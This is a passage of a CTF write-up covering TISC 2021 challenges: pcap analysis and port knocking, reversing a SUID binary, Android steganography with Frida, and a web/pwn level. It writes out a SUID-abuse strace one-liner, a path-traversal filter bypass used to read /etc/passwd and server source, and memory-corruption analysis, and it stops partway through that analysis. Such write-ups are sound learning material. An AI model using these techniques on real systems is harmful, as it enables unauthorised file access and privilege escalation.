08/26/2021-19:47:30.560000  [**] [1:2008715:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
08/26/2021-19:47:30.560000  [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445

At first, I thought I had to extract the binaries sent by the malicious traffic and reverse engineer them, similar to last year's Flare-On Challenge 7. This sent me down a deep, dark rabbit hole in which I attempted to reverse engineer Meterpreter traffic and other payloads. After wasting many hours on reverse engineering, I went back to the port knocking idea. One CTF blogpost suggested that I could use the WireShark filter (tcp.flags.reset eq 1) && (tcp.flags.ack eq 1) to retrieve port knocking sequences. However, this approach failed because in the author's case, the knocked ports responded with a RST, ACK packet whereas for this challenge the knocked ports were completely filtered.

Growing desperate, I noticed that some of the HTTP traffic contained references to the U.S. National CyberWatch Mid-Atlantic Collegiate Cyber Defense Competition (MACCDC) 2012. For example, Network Miner extracted a file named attackerHome.php that included this HTML code:

	<select id='eventSelect' name='eventId'>
		<option value=''>Select an Event...</option>
		<option value='1' >Mid-Atlantic CCDC 2011</option>
		<option value='21' >Cyberlympics - Miami</option>
		<option value='30' >Mid-Atlantic CCDC 2012</option>
 	</select>

Following this lead, I found out that traffic captures for MACCDC 2012 were available online as PCAP files. However, for 2012 alone, the organisers released 16 different PCAP files, each several hundred MBs in size.

With no better ideas, I downloaded every single MACCDC 2012 PCAP file and manually checked each one for matching packets in traffic_capture.pcapng. After several painfully large downloads, I narrowed it down to maccdc2012_00013.pcap.

Next, I used a PCAP diffing script to extract unique packets in traffic_capture.pcapng that did not appear in maccdc2012_00013.pcap. Parsing the two massive files took about half an hour but I got my answer: traffic_capture.pcapng included extra HTTP traffic between 192.168.242.111 and 192.168.24.253.

GET /debug.txt HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 192.168.57.130:21212
Connection: Keep-Alive

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 24 Aug 2021 07:48:38 GMT
Content-type: text/plain
Content-Length: 138
Last-Modified: Tue, 24 Aug 2021 07:43:39 GMT

DEBUG PURPOSES ONLY. CLOSE AFTER USE.
++++++++
5 ports.
++++++++
Account.
++++++++
SSH.
++++++++
End debug. Check and re-enable firewall.

Two things stood out to me. Firstly, the HTTP response suggested that there were 5 ports in the port knocking sequence to open the SSH port. Secondly, the host header 192.168.57.130:21212 did not match the HTTP server IP 192.168.24.253. Perhaps this was a hint about the ports?

I attempted multiple permutations of 192, 168, 57, 130, and 21212 using a port knocking script to no avail. After several more hours sunk into this rabbit hole, I resorted to writing my own diffing script because I realised that the previous PCAP diffing script missed out some packets.

from scapy.all import PcapReader, wrpcap, Packet, NoPayload, TCP


i = 0
with PcapReader('macccdc253.pcap') as maccdc_packets, PcapReader('traffic253.pcap') as traffic_packets:
    for maccdc_packet in maccdc_packets:
        candidate_traffic_packet = traffic_packets.read_packet()
        while maccdc_packet[TCP].payload != candidate_traffic_packet[TCP].payload:
            print("NOMATCH {}".format(i))
            candidate_traffic_packet = traffic_packets.read_packet()
            if TCP not in candidate_traffic_packet:
                print("NOMATCH {}".format(i))
                candidate_traffic_packet = traffic_packets.read_packet()
            i += 1
        i += 1

This new script revealed that there were indeed more unique packets. These turned out to be a series of TCP SYN packets from 192.168.202.95 to 192.168.24.253 followed by an SSH connection!

Port Knocking Packets

Even better, the [PSH, ACK] packet sent from the server after the port knocking sequence contained SSH credentials.

SSH Credentials

This was my ticket. I repeated the port knocking sequence with python .\knock.py <IP ADDRESS> 2928 12852 48293 9930 8283 42069 and I received the packet containing the SSH credentials. The credentials only lasted for a few seconds and changed on each iteration; I probably should have automated the SSH login but manually copying and pasting worked as well.

I logged in as the low-privileged challenjour user. The home folder contained an otpkey executable and secret.txt. secret.txt could only be read by root, but otpkey had the SUID bit set so it could read secret.txt.

I pulled otpkey from the server and decompiled it in IDA. I annotated the pseudocode accordingly:

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int i; // eax
  const char *encrypted_machine_id_hex; // rax
  int can_open_dest_file; // [rsp+18h] [rbp-78h]
  char *dest_file; // [rsp+20h] [rbp-70h]
  char *source_file_bytes; // [rsp+28h] [rbp-68h]
  char *dest_file_bytes; // [rsp+30h] [rbp-60h]
  char *tmp_otk_file; // [rsp+38h] [rbp-58h]
  const char *source_file; // [rsp+40h] [rbp-50h]
  _BYTE *encrypted_machine_id; // [rsp+48h] [rbp-48h]
  char tmp_otk_dir[16]; // [rsp+50h] [rbp-40h] BYREF
  __int64 v14; // [rsp+60h] [rbp-30h]
  __int64 v15; // [rsp+68h] [rbp-28h]
  __int64 v16; // [rsp+70h] [rbp-20h]
  __int16 v17; // [rsp+78h] [rbp-18h]
  unsigned __int64 v18; // [rsp+88h] [rbp-8h]

  v18 = __readfsqword(0x28u);
  can_open_dest_file = 0;
  dest_file = 0LL;
  source_file_bytes = 0LL;
  dest_file_bytes = 0LL;
  tmp_otk_file = 0LL;
  strcpy(tmp_otk_dir, "/tmp/otk/");
  v14 = 0LL;
  v15 = 0LL;
  v16 = 0LL;
  v17 = 0;
  for ( i = getopt(a1, a2, "hm"); ; i = getopt(a1, a2, "hm") )
  {
    if ( i == -1 )
    {
      if ( a1 == 4 )
        return 0LL;
    }
    else
    {
      if ( i != 109 )                           // 'm' so opt is h instead
      {
        printf("Usage: %s [OPTIONS]\n", *a2);
        puts("Print some text :)n");
        puts("Options");
        puts("=======");
        puts("[-m] curr_location new_location \tMove a file from curr location to new location\n");
        exit(0);
      }
      if ( a1 != 4 )
      {
        puts("[-m] curr_location new_location \tMove file from curr location to new location");
        exit(0);
      }
      source_file = a2[2];
      dest_file = a2[3];
      printf("Requested to move %s to %s.\n", source_file, dest_file);
      if ( (unsigned int)is_alpha(source_file) && (unsigned int)is_alpha(dest_file) )
      {
        if ( (unsigned int)check_needle(source_file) )// check if source file has 'secret.t'
          can_open_dest_file = can_open(dest_file);
        if ( can_open_dest_file )
        {
          source_file_bytes = (char *)read_bytes(source_file);
          dest_file_bytes = (char *)read_bytes(dest_file);
          if ( source_file_bytes && dest_file_bytes )
            write_bytes_to_file(dest_file, source_file_bytes);
        }
        else
        {
          source_file_bytes = (char *)read_bytes(source_file);
          if ( source_file_bytes )
          {
            write_bytes_to_file(dest_file, source_file_bytes);
            chmod(dest_file, 0x180u);
          }
        }
      }
    }
    encrypted_machine_id = encrypt_machine_id();
    if ( encrypted_machine_id )
    {
      encrypted_machine_id_hex = (const char *)bytes_to_hex(encrypted_machine_id);
      strncat(tmp_otk_dir, encrypted_machine_id_hex, 0x20uLL);// appends encrypted machine id to /tmp/otk/
      tmp_otk_file = (char *)read_bytes(tmp_otk_dir);
      if ( tmp_otk_file )
        printf("%s", tmp_otk_file);
    }
    else
    {
      puts("An error occurred.");
    }
    free_wrapper(encrypted_machine_id);
    free_wrapper(tmp_otk_file);
    if ( !can_open_dest_file )
      break;
    write_bytes_to_file(dest_file, dest_file_bytes);// restores dest file...
    free_wrapper(source_file_bytes);
    free_wrapper(dest_file_bytes);
    dest_file = 0LL;
  }
  return 0LL;
}

otpkey moved a file from arg1 to arg2. If arg1 was secret.txt, the program wrote the contents of secret.txt to the destination file, but before exiting it would also restore the destination file's original contents, preventing me from reading the flag. The section starting from encrypted_machine_id = encrypt_machine_id(); looked more intresting. It attempted to read /tmp/otk/<encrypt_machine_id()> and print the contents of the file. Since this occurred before it restored the destination file, I could theoretically write secret.txt to the OTK file and print its contents to get the flag!

What string did encrypt_machine_id generate?

_BYTE *encrypt_machine_id()
{
  size_t v0; // rax
  size_t ciphertext_len; // rax
  int i; // [rsp+0h] [rbp-80h]
  void *machine_id; // [rsp+8h] [rbp-78h]
  time_t current_time_reduced; // [rsp+10h] [rbp-70h]
  char *_etc_machine_id; // [rsp+18h] [rbp-68h]
  _BYTE *machine_id_unhexed; // [rsp+20h] [rbp-60h]
  _BYTE *encrypted_machine_id; // [rsp+28h] [rbp-58h]
  char *ciphertext; // [rsp+38h] [rbp-48h]
  char plaintext[8]; // [rsp+46h] [rbp-3Ah] BYREF
  __int16 v11; // [rsp+4Eh] [rbp-32h]
  __int64 v12[2]; // [rsp+50h] [rbp-30h] BYREF
  __int64 md5_hash[4]; // [rsp+60h] [rbp-20h] BYREF

  md5_hash[3] = __readfsqword(0x28u);
  *(_QWORD *)plaintext = 0LL;
  v11 = 0;
  v12[0] = 0x13111D5F1304155FLL;
  v12[1] = 0x14195D151E1918LL;
  encrypted_machine_id = calloc(0x10uLL, 1uLL);
  md5_hash[0] = 0LL;
  md5_hash[1] = 0LL;
  current_time_reduced = time(0LL) / 10;
  snprintf(plaintext, 0xAuLL, "%ld", current_time_reduced);
  v0 = strlen(plaintext);
  ciphertext = (char *)calloc(4 * v0, 1uLL);
  RC4("O).2@g", plaintext, ciphertext);
  strlen(plaintext);
  ciphertext_len = strlen(ciphertext);
  MD5(ciphertext, ciphertext_len, md5_hash);
  free_wrapper(ciphertext);
  _etc_machine_id = xor_0x70((const char *)v12);// xor_0x70
  machine_id = read_bytes(_etc_machine_id);     // fb60706a312b4ddab835445d28153227
  free_wrapper(_etc_machine_id);
  if ( !machine_id )
    return 0LL;
  machine_id_unhexed = (_BYTE *)read_hex_string(machine_id);
  if ( !machine_id_unhexed || !encrypted_machine_id )
    return 0LL;
  for ( i = 0; i <= 15; ++i )
    encrypted_machine_id[i] = machine_id_unhexed[i] ^ *((_BYTE *)md5_hash + i);// xor with each byte of weak md5_hash
  free_wrapper(machine_id_unhexed);
  return encrypted_machine_id;
}

By following the pseudocode, I deduced that the function generated the one-time key using XOR(MD5(RC4(str(time(0LL) / 10, "O).2@g")), machine-id). Since it divided time(0) by 10, each one-time key lasted for ten seconds.

At first, I tried generating the one-time key myself but the output did not match anthing in /tmp/otk. After several more failed attempts, I realised that I could simply use strace to dynamically read otpkey's system calls. When otpkey attempted to read /tmp/otk/<encrypt_machine_id()>, strace hooked the read system call and printed its file path argument.

Since the server had already installed strace, I crafted a Bash one-liner to do this: dest=$(strace ./otpkey -m secret.txt /tmp/ptl 2>&1 | grep /tmp/otk | cut -c 19-59);./otpkey -m secret.txt $dest. With that, I solved the challenge.

TISC{v3RY|53CrE+f|@G}

Level 7: The Secret

Domains: Steganography, Android Security, Cryptography

Our investigators have recovered this email sent out by an exposed PALINDROME hacker, alias: Natasha. It looks like some form of covert communication between her and PALINDROME.

Decipher the communications channel between them quickly to uncover the hidden message, before it is too late.

Submit your flag in the format: TISC{flag found}.

Bye for now.eml

Bye for now.eml contained the following text:


GIB,



I=E2=80=99ll be away for a while. Don=E2=80=99t miss me. You have my pictur=
e :D

Hope the distance between us could help me see life from a different
perspective. Sometimes, you will find the most valuable things hidden in
the least significant places.





Natasha

My hex editor revealed a large base64 string appended as a HTML comment. Decoding the string produced a PNG image file of Natasha Romanoff from the Avengers. Based on the “least significant places” hint from the email message, I suspected that the image embedded data using least sigificant byte steganography. I confirmed this with stegsolve as the plane 0 filters displayed the tell-tale “static” at the top of the image.

Stegsolve Output

I used the stegonline tool to retrieve the bytes, which formed the string https://transfer.ttyusb.dev/8S8P76hlG6yEig2ywKOiC6QMak4iGaKc/data.zip.

The link downloaded a password-protected ZIP file containing an app.apk file. The ZIP file included an extra comment at the bottom: LOBOBMEM MULEBES ULUD RIKIF GNIKCARC EROFEB NIAGA KNIHT. I reversed the string and got THINK AGAIN BEFORE CRACKING FIKIR DULU SEBELUM MEMBOBOL.

Despite such fine advice, I responded in a predictable manner:

I Can't Read

After wasting several hours trying to guess and crack the password, I came across a useful CTF guide that revealed that ZIPs could be pseudo-encrypted by setting the encryption flag without actually encrypting the data. I modified the corresponding byte in my hex editor and lo and behold, I opened the ZIP without a password!

I installed the APK on my test Android phone and opened it.

The Secret App

Clicking “I'M IN POSITION” caused the application to close because the time, latitude, longitude, and data were invalid.

I decompiled the APK with jadx and noticed that the MainActivity function initialised the Myth class, which then executed System.loadLibrary("native-lib"). This corresponded with libnative-lib.so in the APK's lib folder, so I decompiled it IDA. The library exported two interesting functions: Java_mobi_thesecret_Myth_getTruth and Java_mobi_thesecret_Myth_getNextPlace.

Java_mobi_thesecret_Myth_getTruth performed a large number of _mm_shuffle_epi32 decryption routines before returning some plaintext which I suspected was the flag. It also verified that the second argument matched GIB's phone:

v7 = (const char *)(*(int (__cdecl **)(int *, int, char *))(*a4 + 676))(a4, a7, &v74);
v8 = strcmp(v7, "GIB's phone") == 0;

Meanwhile, Java_mobi_thesecret_Myth_getNextPlace checked latitude and longitude values:

if ( *(double *)&a5 > 103.7899 || *(double *)&a4 < 1.285 || *(double *)&a4 > 1.299 || *(double *)&a5 < 103.78 )
{
v10 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Not near. Try again.");
}

It also compared the second argument to a matching time value:

    if ( v7 == 22 && v8 > 30 || v7 == 23 && v8 < 15 )
    {
      std::string::append((int)v20, (int)&all, 71, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 79, 1u);
      std::string::append((int)v20, (int)&all, 82, 1u);
      std::string::append((int)v20, (int)&all, 25, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 13, 1u);
      std::string::append((int)v20, (int)&all, 76, 1u);
      std::string::append((int)v20, (int)&all, 68, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 47, 1u);
      std::string::append((int)v20, (int)&all, 32, 1u);
      std::string::append((int)v20, (int)&all, 43, 1u);
      std::string::append((int)v20, (int)&all, 40, 1u);
      std::string::append((int)v20, (int)&all, 45, 1u);
      std::string::append((int)v20, (int)&all, 35, 1u);
      std::string::append((int)v20, (int)&all, 49, 1u);
      std::string::append((int)v20, (int)&all, 46, 1u);
      std::string::append((int)v20, (int)&all, 44, 1u);
      std::string::append((int)v20, (int)&all, 36, 1u);
      std::string::append((int)v20, (int)&all, 50, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 64, 1u);
      std::string::append((int)v20, (int)&all, 75, 1u);
      std::string::append((int)v20, (int)&all, 74, 1u);
      std::string::append((int)v20, (int)&all, 68, 1u);
      std::string::append((int)v20, (int)&all, 81, 1u);
      if ( (v20[0] & 1) != 0 )
        v9 = (char *)v21;
      else
        v9 = (char *)v20 + 1;
      v11 = (*(int (__cdecl **)(int, char *))(*(_DWORD *)a1 + 668))(a1, v9);
    }
    else
    {
      v11 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Wrong time. Try again.");
    }

Next, I grepped through the decompiled Java code and found that getTruth and getNextPlace were called in f/a/b.java:

    q.a(new g(0, "http://worldtimeapi.org/api/timezone/Etc/UTC", null, new c(mainActivity, textView), new f(textView)));
    String str2 = mainActivity.u;
    boolean z = true;
    if (!(str2 == null || str2.length() == 0)) {
        String nextPlace = mainActivity.y.getNextPlace(mainActivity.u, mainActivity.s, mainActivity.t);
        mainActivity.v = nextPlace;
        if (nextPlace == null || nextPlace.length() == 0) {
            mainActivity.x();
        } else {
            if (c.b.a.b.a.H(mainActivity.v, "Error", false, 2)) {
                mainActivity.x();
                context = mainActivity.getApplicationContext();
                str = mainActivity.v;
            } else {
                p q2 = f.q(mainActivity);
                View findViewById4 = mainActivity.findViewById(R.id.data_text);
                c.c(findViewById4, "findViewById(R.id.data_text)");
                TextView textView2 = (TextView) findViewById4;
                q2.a(new k(0, mainActivity.v, new g(mainActivity, textView2), new e(textView2)));
                String str3 = mainActivity.w;
                if (!(str3 == null || str3.length() == 0) || mainActivity.x != 0) {
                    int i2 = mainActivity.x;
                    if (i2 == 1) {
                        View findViewById5 = mainActivity.findViewById(R.id.flag_value);
                        c.c(findViewById5, "findViewById(R.id.flag_value)");
                        TextView textView3 = (TextView) findViewById5;
                        String string = Settings.Global.getString(mainActivity.getContentResolver(), "device_name");
                        if (!(string == null || string.length() == 0)) {
                            z = false;
                        }
                        if (z) {
                            string = Settings.Global.getString(mainActivity.getContentResolver(), "bluetooth_name");
                        }
                        Myth myth = mainActivity.y;
                        String str4 = mainActivity.w;
                        c.c(string, "user");
                        String truth = myth.getTruth(str4, string);
                        if (c.b.a.b.a.H(truth, "Error", false, 2)) {
                            Toast.makeText(mainActivity.getApplicationContext(), truth, 0).show();
                            return;
                        } else {
                            textView3.setText(truth);
                            return;
                        }

By tracing back variables using the jadx GUI “Find Usage” option, I reconstructed the flow of the application. mainActivity.y.getNextPlace took in the current timestamp from http://worldtimeapi.org/api/timezone/Etc/UTC(parsed to HH:MM) and the latitude and longitude, returning a link. After that, the application called myth.getTruth with str4 and the current username as arguments. Since the IDA decompilation already revealed that the user value needed to be GIB's phone, I only needed to find out the expected value of str4.

The decompiled Java code showed that String str4 = mainActivity.w; and mainActivity.w was set in f/a/g.java by the a function:

    public final void a(Object obj) {
        MainActivity mainActivity = this.a;
        TextView textView = this.f2157b;
        String str = (String) obj;
        int i = MainActivity.q;
        c.d(mainActivity, "this$0");
        c.d(textView, "$dataTextView");
        try {
            c.c(str, "response");
            int e2 = e.e(str, "tgme_page_description", 0, true, 2);
            String str2 = (String) e.g(str.subSequence(e2, e.b(str, "</div>", e2, true)), new String[]{">"}, false, 0, 6).get(1);
            mainActivity.w = str2;
            textView.setText(str2);
            mainActivity.x = 1;
        } catch (Exception unused) {
            mainActivity.x = -1;
        }
    }

I looked up tgme_page_description and learned that this was the HTML class for the description text in a Telegram group page.

I moved on to dynamic instrumentation with Frida and wrote a quick script to trigger getNextPlace directly in the application with the correct arguments.

function exploit() {
    // Check if frida has located the JNI
    if (Java.available) {
        // Switch to the Java context
        Java.perform(function() {
            const Myth = Java.use('mobi.thesecret.Myth');
            var myth = Myth.$new();
            var string_class = Java.use("java.lang.String");

            var out = string_class.$new("");
            var timestamp = string_class.$new("22:31");

            out = myth.getNextPlace(timestamp, 1.286, 103.785);
            console.log(out)
        }
    )}
}

I executed this script via my connected computer with frida -U 'The Secret' -l exploit.js. To my pleasant surprise, getNextPlace returned a Telegram link: https://t.me/PALINDROMEStalker. The description box displayed the string I was looking for: ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV.

Telegram Group

Now all I had to do was to feed getTruth the correct arguments.

function exploit() {

    // Check if frida has located the JNI
    if (Java.available) {
        // Switch to the Java context
        Java.perform(function() {
            const Myth = Java.use('mobi.thesecret.Myth');
            var myth = Myth.$new();
            var string_class = Java.use("java.lang.String");

            var out = string_class.$new("");
            var timestamp = string_class.$new("22:31");

            var tele_description = string_class.$new("ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV");

            var user = string_class.$new("GIB's phone");

            out = myth.getNextPlace(timestamp, 1.286, 103.785);
            console.log(out)

            out = myth.getTruth(tele_description, user);
            console.log(out)
        }
    )}
}

The script printed the flag and completed this challenge.

TISC{YELENAFOUNDAWAYINSHEISOUREYESANDEARSWITHIN}

Level 8: Get-Shwifty

Domains: Web, Reverse Engineering, Pwn

We have managed to track down one of PALINDROME's recruitment operations!

Our intel suggest that they have defaced our website and insert their own recruitment test.

Pass their test and get us further into their organization!

We are counting on you!

The following links are mirrors of each other, flags are the same:

http://tisc21c-v3clxv6ecfdrvyrzn5mz7mchv8v7wcpv.ctf.sg:42651

http://tisc21c-8pz0kdhumzaj1lthraa6tm6t27righ8y.ctf.sg:42651

http://tisc21c-wwhvyoobqg08oegfsdvnmcflgfsbx0xd.ctf.sg:42651

NOTE: THE CHALLENGE DOES NOT INVOLVE EXTERNAL LINKS THAT MAY OR MAY NOT BE FOUND IN THE PROVIDED WEBSITE.

I finally reached the Elite Three. From this point onwards, the level of difficulty racheted up greatly and took significant effort to crack. I groaned internally when I saw that Level 8 was a Pwn challenge: while I understood the basics of Windows binary exploitation, I lacked confidence in Linux exploitation and had never completed a Pwn CTF challenge before. Nevertheless, this was the only thing standing in the way of the first $10k.

I opened the link to the hacked website.

Hacked Page

I inspected the HTML source code and noticed a commented-out Find out more about the PALINDROME link. The link redirected to /hint/?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d which contained a single picture.

Hint

What other hint hash had I found...? I began fuzzing the hash query parameter and noticed that hash=./aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d returned the same picture. This suggested a file traversal vulnerability. However, attempting to go straight to ../../../../etc/passwd failed. I worked incrementally by traversing backwards one directory at a time and discovered that the application blacklisted three consecutive traversals (../../../). To bypass this, I simply used ../.././../ which successfully allowed me to access any file on the server! The page returned the file data as a base64-encoded image source.

<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>

<img src='data:image/png;base64,<BASE64 ENCODED FILE DATA>'>

Unfortunately, I did not find any interesting information in /etc/passwd or /etc/hosts. Eventually, I decided to check the source code of the website's pages which turned out to be PHP. I struck gold with /var//www/html/hint/index.php:

<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>

<?php
    if($_GET["hash"]){
        echo "<img src='data:image/png;base64,".base64_encode(file_get_contents($_GET["hash"]))."'>";
        die();
    }else{
        header("Location: /hint?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d");
        die();
    }

    // to the furure me: this is the old directory listing
    // 
    // hint:
    // total 512
    // drwxrwxr-x 2 user user   4096 Jun 16 21:52 ./
    // drwxr-xr-x 5 user user   4096 Jun 16 21:11 ../
    // -rw-rw-r-- 1 user user     18 Jun 16 22:12 68a64066b1f37468f5191d627473891ac0ef9243
    // -rw-rw-r-- 1 user user 489519 Jun 16 15:47 aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
    // -rw-rw-r-- 1 user user  15710 Jun 16 21:52 b5dbffb4375997bfcba86c4cd67d74c7aef2b14e
    // -rw-r--r-- 1 user user    551 Jun 16 21:30 index.php
?>

</body>
</html>

Following the directory listing, I accessed two new files.

68a64066b1f37468f5191d627473891ac0ef9243 was a text file that said i am also on 53619.

b5dbffb4375997bfcba86c4cd67d74c7aef2b14e contained another directory listing.

bin:
total 28
-rwsrwxr-x 1 root root 22752 Aug 19 15:59 1adb53a4b156cef3bf91c933d2255ef30720c34f

I proceeded to leak /var/www/html/bin/1adb53a4b156cef3bf91c933d2255ef30720c34f which turned out to be an ELF executable.

Here it comes

As described in the text file earlier, this binary ran on port 53619 on the server. I executed it locally and was greeted by a large alien head.

        ___          
    . -^   `--,      
   /# =========`-_   
  /# (--====___====\ 
 /#   .- --.  . --.| 
/##   |  * ) (   * ),
|##   \    /\ \   / |
|###   ---   \ ---  |
|####      ___)    #|
|######           ##|
 \##### ---------- / 
  \####           (  
   `\###          |  
     \###         |  
      \##        |   
       \###.    .)   
        `======/     
SHOW ME WHAT YOU GOT!!!


////////////// MENU //////////////
//  0. Help                     //
//  1. Do Sanity Test           //
//  2. Get Recruited            //
//  3. Exit Program             //
//////////////////////////////////

The “Do Sanity Test” option prompted me for input.

To pass the sanity test, you just need to give a sane answer to show that you are not insane!
Your answer:

After entering some random text, I tried the “Get Recruited” option. However, the application printed the error message You must be insane! Complete the Sanity Test to prove your sanity first!.

To figure out what was going on, I decompiled the application in IDA and annotated the pseudocode for the “Do Sanity Test” option.

__int64 sanity_test()
{
  void *v0; // rsp
  void *v1; // rsp
  void *v2; // rsp
  int v4; // [rsp+14h] [rbp-24h] BYREF
  void *s; // [rsp+18h] [rbp-20h]
  void *src; // [rsp+20h] [rbp-18h]
  void *dest; // [rsp+28h] [rbp-10h]
  unsigned __int64 v8; // [rsp+30h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  ++dword_5580E5357280;
  v4 = 32;
  v0 = alloca(48LL);
  s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
  v1 = alloca(48LL);
  src = s;
  v2 = alloca(48LL);
  dest = s;
  memset(s, 0, v4);
  memset(src, 0, v4);
  memset(dest, 0, v4);
  std::operator>><char,std::char_traits<char>>(&std::cin, src);
  memcpy(dest, src, v4);
  memcpy(s, dest, v4 / 2);
  sanity_test_input = malloc(v4 - 1);
  memcpy(sanity_test_input, s, v4 - 1);
  sanity_test_result = *((_BYTE *)s + v4 - 1);
  return 0LL;
}

Following a series of three suspicious memcpys, the function set sanity_test_result to the 32nd byte of the input. Next, the “Get Recruited” function checked if sanity_test_result && !(unsigned int8)shl_sanity_test_result_7(). In other words, to pass the sanity test, I had to enter input such that sanity_test_result != 0 and (unsigned __int8)(sanity_test_result << 7) = 0. I could pass this check rather easily with an even number, such as 0x40 (@ in ASCII). Now, instead of displaying an error message, the “Get Recruited” option prompted me for a different set of inputs.

To get recruited, you need to provide the correct passphrase for the Cromulon.
Passphrase: AAA
Your passphrase appears to be incorrect.
You are allowed a few tries to modify your passphrase.
Use the following functions to provide the correct answer to get recruited.
1. Append String
2. Replace Appended String
3. Modify Appended String
4. Show what you have for the Cromulon currently
5. Submit
6. Back

The various options looked ripe for some kind of use-after-free vulnerability... except that there were not a lot of frees going on. The binary handled the appended strings using a linked list and I could not find any issues in the memory management. I also suspected that it suffered from a format string bug because entering %x%x%x for the passphrase caused the “Show what you have for the Cromulon currently” option to print e8e8e8e8. However, after further reverse engineering, I realised I misunderstood the source of the strange output. It turned out that when appending, replacing, or modifying a string, the user's input would be XORed with the input from the sanity test before it was stored in the linked list. For example, since I entered a series of @s for the the sanity test, @@ XOR %x == e8.

char __fastcall xor_passphrase_with_sanity_input(_BYTE *passphrase_data)
{
  char result; // al
  _BYTE *v2; // rax
  _BYTE *passphrase_data_2; // [rsp+0h] [rbp-18h]
  _BYTE *v4; // [rsp+10h] [rbp-8h]

  passphrase_data_2 = passphrase_data;
  v4 = sanity_test_input;
  result = *passphrase_data;
  if ( *passphrase_data )
  {
    result = *(_BYTE *)sanity_test_input;
    if ( *(_BYTE *)sanity_test_input )
    {
      do
      {
        if ( !*v4 )
          v4 = sanity_test_input;
        v2 = v4++;
        *passphrase_data_2++ ^= *v2;
        result = *passphrase_data_2 != 0;
      }
      while ( *passphrase_data_2 );
    }
  }
  return result;
}

This behaviour resembled an information leak, so perhaps the actual vulnerability occurred in the sanity test. Remember the suspicious series of memcpys?

I started the application in gdb with the pwndbg extension and entered a long series of As for the sanity test. I got a crash and traced it back to the first memcpy. The arguments to memcpy were overwritten by my input:

dest: 0x4141414141414141 ('AAAAAAAA')
src: 0x4141414141414141 ('AAAAAAAA')
n: 0x41414141 ('AAAA')

This looked like a powerful write-what-where gadget! However, exploitation would not be easy. I ran checksec and confirmed that all possible memory protections were turned on, therefore ruling out a simple return pointer overwrite exploit.

pwndbg> checksec
[*] '/home/kali/Desktop/tisc/8_get_shwifty/1adb53a4b156cef3bf91c933d2255ef30720c34f'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

I took a closer look at sanity test pseudocode to figure out another way to exploit this overwrite.

void *v0; // rsp
void *v1; // rsp
void *v2; // rsp
int v4; // [rsp+14h] [rbp-24h] BYREF
void *s; // [rsp+18h] [rbp-20h]
void *src; // [rsp+20h] [rbp-18h]
void *dest; // [rsp+28h] [rbp-10h]
unsigned __int64 v8; // [rsp+30h] [rbp-8h]

v8 = __readfsqword(0x28u);
++dword_5580E5357280;
v4 = 32;
v0 = alloca(48LL);
s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
v1 = alloca(48LL);
src = s;
v2 = alloca(48LL);
dest = s;
memset(s, 0, v4);
memset(src, 0, v4);
memset(dest, 0, v4);
std::operator>><char,std::char_traits<char>>(&std::cin, src);
memcpy(dest, src, v4);
memcpy(s, dest, v4 / 2);
sanity_test_input = malloc(v4 - 1);
memcpy(sanity_test_input, s, v4 - 1);
sanity_test_result = *((_BYTE *)s + v4 - 1);
return 0LL;

The alloca and memcpy calls were run in a precise order. I set a breakpoint at the first memcpy and triggered the overflow again to analyse the stack. After a few repetitions, I figured out how the overflow worked. At the memcpy breakpoint, the stack looked like this:

00: 0x00000000  0x00000000  0x00000000  0x00000000 < *1st memcpy dst / *2nd memcpy src
10: 0x00000000  0x00000000  0x00000000  0x00000000
20: 0x00000000  0x00000000  0xaf79a963  0x00007fab
30: 0x41414141  0x41414141  0x41414141  0x41414141 < *1st memcpy src / start of user-controlled input
40: 0x41414141  0x41414141  0x41414141  0x41414141
50: 0x41414141  0x41414141  0x41414141  0x41414141
60: 0x41414141  0x41414141  0x41414141  0x41414141 < *2nd memcpy dst
70: 0x41414141  0x41414141  0x41414141  0x41414141
80: 0x41414141  0x41414141  0x41414141  0x41414141
90: 0x41414141  0x41414141  0x41414141  0x00000030 < 12 bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
a0: 0x5d7d2b60  0x00007ffc  0x5d7d2b30  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
b0: 0x5d7d2b00  0x00007ffc  0x48531900  0xa14ea5c4 < 1st memcpy dst / 2nd memcpy src | stack canary 
c0: 0x5d7d2bf0  0x00007ffc  0x86bfeea2  0x0000563e < 8 bytes | return pointer
d0: 0x86c00010  0x0000563e  0x86bfd540  0x0001013e
e0: 0x86c01956  0x0000563e  0x48531900  0xa14ea5c4

